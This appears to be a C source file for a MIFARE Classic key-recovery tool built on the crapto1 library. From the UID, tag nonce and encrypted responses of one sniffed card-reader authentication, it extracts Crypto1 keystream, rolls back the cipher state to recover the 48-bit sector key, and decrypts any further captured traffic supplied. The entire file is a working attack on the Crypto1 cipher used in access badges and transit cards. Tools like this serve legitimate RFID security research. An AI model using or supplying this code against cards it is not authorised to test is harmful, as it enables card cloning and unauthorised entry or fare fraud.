| 1 | #include <stdio.h> |
| 2 | #include <string.h> |
| 3 | #include <inttypes.h> |
| 4 | #include "crapto1/crapto1.h" |
| 5 | #include "util.h" |
| 6 | |
| 7 | int main (int argc, char *argv[]) |
| 8 | { |
| 9 | uint32_t uid; // serial numDber |
| 10 | uint32_t nt; // tag challenge |
| 11 | uint32_t nr_enc; // encrypted reader challenge |
| 12 | uint32_t ar_enc; // encrypted reader response |
| 13 | uint32_t at_enc; // encrypted tag response |
| 14 | uint64_t key = 0; // recovered key |
| 15 | struct Crypto1State *revstate; |
| 16 | uint32_t ks2; // keystream used to encrypt reader response |
| 17 | uint32_t ks3; // keystream used to encrypt tag response |
| 18 | |
| 19 | printf("MIFARE Classic key recovery - based on 64 bits of keystream\n"); |
| 20 | printf("Recover key from only one complete authentication!\n\n"); |
| 21 | |
| 22 | if (argc < 6 ) { |
| 23 | printf(" syntax: %s <uid> <nt> <{nr}> <{ar}> <{at}> [enc] [enc...]\n\n", argv[0]); |
| 24 | return 1; |
| 25 | } |
| 26 | |
| 27 | int encc = argc - 6; |
| 28 | int enclen[encc]; |
| 29 | uint8_t enc[encc][120]; |
| 30 | |
| 31 | sscanf(argv[1], "%x", &uid); |
| 32 | sscanf(argv[2], "%x", &nt); |
| 33 | sscanf(argv[3], "%x", &nr_enc); |
| 34 | sscanf(argv[4], "%x", &ar_enc); |
| 35 | sscanf(argv[5], "%x", &at_enc); |
| 36 | for (int i = 0; i < encc; i++) { |
| 37 | enclen[i] = strlen(argv[i + 6]) / 2; |
| 38 | for (int i2 = 0; i2 < enclen[i]; i2++) { |
| 39 | sscanf(argv[i+6] + i2*2,"%2x", (unsigned int*)&enc[i][i2]); |
| 40 | } |
| 41 | } |
| 42 | |
| 43 | printf("Recovering key for:\n"); |
| 44 | printf(" uid: %08x\n", uid); |
| 45 | printf(" nt: %08x\n", nt); |
| 46 | printf(" {nr}: %08x\n", nr_enc); |
| 47 | printf(" {ar}: %08x\n", ar_enc); |
| 48 | printf(" {at}: %08x\n", at_enc); |
| 49 | for (int i = 0; i < encc; i++) { |
| 50 | printf("{enc%d}: ", i); |
| 51 | for (int i2 = 0; i2 < enclen[i]; i2++) { |
| 52 | printf("%02x", enc[i][i2]); |
| 53 | } |
| 54 | printf("\n"); |
| 55 | } |
| 56 | |
| 57 | printf("\nLFSR successors of the tag challenge:\n"); |
| 58 | printf(" nt' : %08x\n",prng_successor(nt, 64)); |
| 59 | printf(" nt'': %08x\n",prng_successor(nt, 96)); |
| 60 | |
| 61 | // Extract the keystream from the messages |
| 62 | ks2 = ar_enc ^ prng_successor(nt, 64); |
| 63 | ks3 = at_enc ^ prng_successor(nt, 96); |
| 64 | |
| 65 | uint64_t start_time = msclock(); |
| 66 | revstate = lfsr_recovery64(ks2, ks3); |
| 67 | uint64_t time_spent = msclock() - start_time; |
| 68 | printf("Time spent in lfsr_recovery64(): %1.2f seconds\n", (float)time_spent/1000.0); |
| 69 | printf("\nKeystream used to generate {ar} and {at}:\n"); |
| 70 | printf(" ks2: %08x\n",ks2); |
| 71 | printf(" ks3: %08x\n",ks3); |
| 72 | |
| 73 | // Decrypting communication using keystream if presented |
| 74 | if (argc > 6 ) { |
| 75 | printf("\nDecrypted communication:\n"); |
| 76 | uint8_t ks4; |
| 77 | int rollb = 0; |
| 78 | for (int i = 0; i < encc; i++) { |
| 79 | printf("{dec%d}: ", i); |
| 80 | for (int i2 = 0; i2 < enclen[i]; i2++) { |
| 81 | ks4 = crypto1_byte(revstate, 0, 0); |
| 82 | printf("%02x", ks4 ^ enc[i][i2]); |
| 83 | rollb += 1; |
| 84 | } |
| 85 | printf("\n"); |
| 86 | } |
| 87 | for (int i = 0; i < rollb; i++) { |
| 88 | lfsr_rollback_byte(revstate, 0, 0); |
| 89 | } |
| 90 | } |
| 91 | |
| 92 | lfsr_rollback_word(revstate, 0, 0); |
| 93 | lfsr_rollback_word(revstate, 0, 0); |
| 94 | lfsr_rollback_word(revstate, nr_enc, 1); |
| 95 | lfsr_rollback_word(revstate, uid ^ nt, 0); |
| 96 | crypto1_get_lfsr(revstate, &key); |
| 97 | crypto1_destroy(revstate); |
| 98 | |
| 99 | printf("\nFound Key: [%012" PRIx64"]\n\n",key); |
| 100 | |
| 101 | } |